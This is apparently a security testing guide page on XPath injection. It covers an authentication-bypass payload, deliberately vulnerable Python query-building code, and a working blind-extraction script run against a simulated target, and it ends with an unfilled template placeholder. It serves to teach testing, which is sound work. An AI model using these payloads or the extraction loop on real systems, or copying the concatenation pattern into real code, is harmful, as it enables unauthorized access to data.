Testing for XPath Injection (OTG-INPVAL-010)

Brief Summary
XPath is a language designed to operate on data described with XML. XPath injection allows an attacker to inject XPath elements into a query that uses this language. Possible goals include bypassing authentication or accessing information without authorization.

Short Description of the Issue (Topic and Explanation)
Web applications rely heavily on databases to store and access the data they need for their operations. Since the dawn of the Internet, relational databases have been by far the most common paradigm, but in recent years databases that organize data using XML have become increasingly popular. Just as relational databases are accessed with SQL, XML databases use XPath, which is their standard query language. Because XPath is conceptually very similar to SQL in its purpose and applications, XPath injection attacks follow the same logic as SQL Injection attacks. In some respects XPath is even more powerful from the attacker's point of view than standard SQL, because all of its capabilities are defined in its specification, whereas a large share of the techniques used in a SQL Injection attack depend on the peculiarities of the SQL dialect used by the target database. This means that XPath injection attacks can be much more adaptable and ubiquitous. Another advantage of an XPath injection attack is that, unlike with SQL, no ACLs are enforced: the injected query can access every part of the XML document.

Black Box testing and example
The attack pattern was first published by Amit Klein (see References at the bottom of the page) and is very similar to the usual SQL Injection. To get a first grasp of the problem, imagine a login page that manages authentication to an application, where the user must enter a username and password. Assume that the database is represented by the following XML file:

    <users>
      <user>
        <username>gandalf</username>
        <password>!c3</password>
        <account>admin</account>
      </user>
      <user>
        <username>Stefan0</username>
        <password>w1s3c</password>
        <account>guest</account>
      </user>
      <user>
        <username>tony</username>
        <password>Un6R34kb!e</password>
        <account>guest</account>
      </user>
    </users>

An XPath query that returns the account whose username is "gandalf" and whose password is "!c3" would be the following:

    string(//user[username/text()='gandalf' and password/text()='!c3']/account/text())

If the application does not properly filter such input, the attacker will be able to inject XPath code and interfere with the query result. For instance, the attacker could input the following values:

    Username: ' or '1' = '1
    Password: ' or '1' = '1

Looks quite familiar, doesn't it? Using these parameters, the query becomes:

    string(//user[username/text()='' or '1' = '1' and password/text()='' or '1' = '1']/account/text())

Because "and" binds more tightly than "or" in XPath, the trailing or '1' = '1' makes the predicate true for every user node. As in a common SQL Injection attack, we have created a query that always evaluates to true, which means that the application will authenticate the user even if no valid username or password has been provided.
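The following Python sketch illustrates how such a query could end up being assembled on the server side. It is only an assumption about the application's code: the function name build_login_query is hypothetical, and the sketch only builds the query string (it does not evaluate it), which is enough to see how the attacker's quotes change the structure of the predicate.

```python
def build_login_query(username, password):
    # Deliberately vulnerable (hypothetical server-side code): user input is
    # pasted into the XPath expression without any escaping or validation.
    return (
        "string(//user[username/text()='" + username
        + "' and password/text()='" + password
        + "']/account/text())"
    )


# Normal use: the input stays inside the two string literals.
legit = build_login_query("gandalf", "!c3")

# Injection: each value closes its literal and appends an always-true test.
injected = build_login_query("' or '1' = '1", "' or '1' = '1")

print(legit)
print(injected)
```

Printing both strings side by side shows that the injected values are no longer data: they have become part of the XPath predicate itself.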

As in a common SQL Injection attack, the first step in testing for XPath injection is to insert a single quote (') in the field to be tested, which introduces a syntax error in the query, and then check whether the application returns an error message.
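To see why a lone quote is an effective probe, the sketch below builds the query for a username of ' and checks whether a string literal is left open. Both helper names are hypothetical, and the scanner is a simplification that relies on XPath 1.0 string literals having no escape sequences; a real XPath parser would report the problem in its own way.

```python
def build_login_query(username, password):
    # Hypothetical vulnerable query construction (plain string concatenation).
    return (
        "string(//user[username/text()='" + username
        + "' and password/text()='" + password
        + "']/account/text())"
    )


def has_unterminated_literal(expr):
    # Walk the expression and track whether we are inside a '...' or "..."
    # literal. XPath 1.0 literals have no escapes, so a literal simply ends
    # at the next occurrence of the quote character that opened it.
    open_quote = None
    for ch in expr:
        if open_quote is None:
            if ch in "'\"":
                open_quote = ch
        elif ch == open_quote:
            open_quote = None
    return open_quote is not None


normal_query = build_login_query("gandalf", "!c3")
probe_query = build_login_query("'", "x")

print(has_unterminated_literal(normal_query))  # False
print(has_unterminated_literal(probe_query))   # True
```

An expression with an open literal cannot be parsed, so an application that passes the probe through unfiltered will typically fail at query evaluation; whether that failure is visible to the tester depends on how the application handles errors.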

If nothing is known about the internal details of the XML data, and the application does not provide useful error messages that help us reconstruct its internal logic, it is still possible to perform a fully blind attack whose goal is to reconstruct the whole data structure. The technique is similar to inference-based SQL Injection: the approach is to inject code that creates a query returning one bit of information. This technique is also explained in more detail by Amit Klein in the referenced paper.
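The inference approach can be sketched in Python as follows. This is an illustration under stated assumptions, not Klein's exact procedure: the payload wrapper, the function names, and the character set are all hypothetical, and make_simulated_target is a local stand-in for the vulnerable application (it understands only the two condition shapes used here) so that the example runs without a network. In a real test, send would submit the payload in the username field and report whether the login succeeded. The functions string-length() and substring() are standard XPath 1.0.

```python
import re
import string

# Hypothetical wrapper for the username field. Injected into the login query,
# the predicate becomes:
#   username/text()='' or <condition> or 'a'='b' and password/text()='...'
# so, assuming no empty usernames, it is true exactly when <condition> is true.
PREFIX = "' or "
SUFFIX = " or 'a'='b"

# Candidate characters; quote characters are left out because they would
# break the injected string literal.
ALPHABET = string.ascii_letters + string.digits + "!@#$%_-."


def build_probe(condition):
    return PREFIX + condition + SUFFIX


def extract_string(send, expr, max_len=64):
    """Recover the string value of expr using only yes/no answers from send."""
    length = None
    for n in range(max_len + 1):
        if send(build_probe(f"string-length({expr})={n}")):
            length = n
            break
    if length is None:
        raise ValueError("length not found within max_len")

    recovered = []
    for pos in range(1, length + 1):  # XPath string positions are 1-based
        for ch in ALPHABET:
            if send(build_probe(f"substring({expr},{pos},1)='{ch}'")):
                recovered.append(ch)
                break
        else:
            raise ValueError(f"character at position {pos} is not in ALPHABET")
    return "".join(recovered)


def make_simulated_target(values):
    """Simulated application: maps an XPath expression to its string value."""
    length_re = re.compile(r"^string-length\((.+)\)=(\d+)$")
    substr_re = re.compile(r"^substring\((.+),(\d+),1\)='(.)'$")

    def send(payload):
        condition = payload[len(PREFIX):-len(SUFFIX)]
        m = length_re.match(condition)
        if m:
            return len(values[m.group(1)]) == int(m.group(2))
        m = substr_re.match(condition)
        if m:
            pos = int(m.group(2))
            return values[m.group(1)][pos - 1:pos] == m.group(3)
        raise ValueError("condition not supported by the simulation")

    return send


send = make_simulated_target({"//user[1]/username": "gandalf"})
print(extract_string(send, "//user[1]/username"))  # gandalf
```

The example expression assumes the element names are already known. In a fully blind setting the same loop could be pointed at expressions built from name() and count() to discover element names and the number of children first.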

Gray Box testing and example
Testing for Topic X vulnerabilities: ... Result Expected: ...